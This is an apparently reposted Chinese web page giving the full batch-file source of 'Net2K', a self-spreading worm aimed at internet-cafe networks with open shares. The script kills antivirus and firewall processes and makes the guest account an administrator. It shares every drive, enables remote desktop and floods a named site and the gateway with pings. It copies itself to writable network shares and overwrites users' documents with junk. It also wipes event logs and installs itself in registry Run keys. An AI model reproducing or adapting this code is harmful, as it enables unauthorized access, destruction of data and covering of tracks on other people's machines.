分享
 
 
 

局域网共享蠕虫Net2K Beta v1.0版

王朝other·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

写这个蠕虫主要是针对网吧,因为看到很多网吧开着共享,却无须密码就可以访问。这个蠕虫只要发现有可写权限的共享便可以将自身复

制进去,用AT命令或系统下次启动时启动。由于时间和设备的关系,这个蠕虫我并未去认真测试过,相信应该有不少BUG吧,有个按时感染每级

目录目标文件的BUG一直没有更好的解决思路,大家发现问题后请告知我,或你能修正、完善代码,请COPY我一份啊,先行谢过!

@echo off

echo  

echo.

echo 局域网共享蠕虫Net2K Beta v1.0版

echo.

echo.

echo Net2K原创作品,欢迎访问http://www.52chb.com

echo.

echo 警告:本程序只做研究测试之用,对您运行本程序所造成一切后果本人概不负责!

echo 按任意键继续或关闭本程序退出

pause>nul

cls

tskill ccapp

tskill Rfw

tskill KAVPFW

tskill KAV9X

tskill PFW

tskill RavMon

if not exist c:\autoexec.bat copy /y %windir%\system32\autoexec.bat c:if not exist %windir%\system32\autoexec.bat copy c:\autoexec.bat

call attrib +h +r c:\autoexec.bat && attrib +h +r %windir%\system32\autoexec.bat

doskey at=

SET pk=1

SET ak1=254

IF %pk%==1 (

SET /A ak1=%RANDOM% %% %aK1%

)

SET LOVE=$%ak1%

attrib -h -r c:\msdos.sys && attrib -h -r c:\config.sys >nul

echo [option] >c:\msdos.sys

echo bootkey=1 >>c:\msdos.sys

echo BootMenu=0 >>c:\msdos.sys

echo BootWarn=0 >>c:\msdos.sys

echo BootFailSafe=0 >>c:\msdos.sys

echo DisabeLog =1 >>c:\msdos.sys

for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k >c:\config.sys

attrib +r +h c:\msdos.sys && ATTRIB +H +R c:\config.sys >nul

for %%k in (a:,c:,d:,e:,f:,g:,h:,i:,j:,k:,m:,l:,n:,o:,p:,q:,r:,s:,t:,u:,v:,w:,x:,y:,z:) do @subst %%k %SystemRoot%\desktop

echo [rename] >Wininit.tmp

echo c:\windows\Wininit.ini=C:\Wininit.tmp >>Wininit.tmp

echo DIRNUL=F:\ >>Wininit.tmp

echo DIRNUL=E:\ >>Wininit.tmp

echo DIRNUL=D:\ >>Wininit.tmp

net view >a.txt

find "\\" a.txt >>l.txt

for /f "skip=2" %%a in (l.txt) do @copy /y Wininit.tmp %%a\C$

for /f "skip=2" %%a in (l.txt) do @call attrib +r +h %%a\C$\Wininit.tmp

net user guest Net2k%& /active:yes

net localgroup administrators guest /add

net share "ipc$"

net share "admin$"

net share "netbois"

net share "rpcss"

echo [Components] >c:\3389

echo TSEnable = on >>c:\3389

sysconmgr /i:sysoc.inf /u:c:\3389 /q

: 开硬盘共享

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @net share %%k$=%%k:\

: 攻击网关

ipconfig >Cf.txt && find "Default Gateway" Cf.txt >CH.txt

for /f "skip=2 tokens=13" %%a in (CH.txt) do @echo ping -n 20 -l 800 %%a

ping www.xhcatv.com.cn /n 15 /l 800

ping www.xhcatv.com.cn /n 15 /l 800

ping www.xhcatv.com.cn /n 15 /l 800

ping www.xhcatv.com.cn /n 15 /l 800

: 将自身复制到局域网内所有共享硬盘根目录

for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy autoexec.bat %%a\%%k$

for /f "skip=2" %%a in (l.txt) do for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%a\%%k$

\Autoexec.bat

cls

del %windir%\system32\logfiles\w3svc1\*.* /f /q

del %windir%\system32\logfiles\w3svc2\*.* /f /q

del %windir%\system32\config\*.event /f /q

del %windir%\system32\dtclog\*.* /f /q

del %windir%\*.txt /f /q

del %windir%\*.log /f /q

cls

: 将自身复制硬盘根目录

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @copy /y autoexec.bat %%k:

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @at 9:50 %%K:\autoexec.bat

:按时感染每级目录目标文件

echo @echo off >pk.bat

echo SET pk=1 >>pk.bat

echo SET ak1=19 >>pk.bat

echo SET ak2=19 >>pk.bat

echo IF %pk%==1 ( >>pk.bat

echo SET /A ak1=%RANDOM% %% %aK1% >>pk.bat

echo SET /A ak2=%RANDOM% %% %aK2% >>pk.bat

echo ) >>pk.bat

echo SET win=a%ak1%x >>pk.bat

echo copy /y pk.bat+xy.bat %win%.bat >>pk.bat

echo for %%y in (*.DOC,*.XLS,*.TXT,*.RIF,*.DBF,*.ARJ,*.log) do @echo FEI LOV YOU>%%y >>pk.bat

echo at 9:55 %win%.bat >>pk.bat

attrib /d /s -h -r

dir |find "<DIR>" >>Mm.txt

for /f "tokens=4" %%i in (Mm.txt) do @copy /y pk.bat %%i\>>%LOVE%.bat

for /f "tokens=4" %%i in (Mm.txt) do @echo at 9:55 %%i\%win%.bat >>%LOVE%.bat call %LOVE%.bat

for /f "tokens=4" %%i in (Mm.txt) do @echo > %%i\pp.txt

for /f "tokens=4" %%i in (Mm.txt) do @echo dir >>%%i\pp.txt

for /f "tokens=4" %%i in (Mm.txt) do @echo find "<DIR>" pp.txt > %%i\pp.bat

for /f "tokens=4" %%i in (Mm.txt) do @ren %%i\pp.txt l.bat

for /f "tokens=4" %%i in (Mm.txt) do @copy %%i\l.bat+pp.bat xy.bat

for %%k in (c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @call attrib +r +h %%k:\%win%.bat

cls

echo REGEDIT4>>lov.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>lov.reg

echo "lovF"="c:\\autoexec.bat">>lov.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>lov.reg

echo "lov"="c:\\windows\\system32\\autoexec.bat">>lov.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings]>>lov.reg

echo "Key"=hexb,23,45,6f,8e,41,70,4c,44,5e,d0,23,79,c2,b4,b1>>h.reg

echo "Hint"="Hello. I am Net2K.">>lov.reg

reg import lov.reg

echo @echo off >del.bat

echo if exist *.* (del /f /q *.bat,*.tmp,*.txt,*.reg) else echo >>del.bat

call del.bat >nul

: 清扫战场闪人...

exit

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有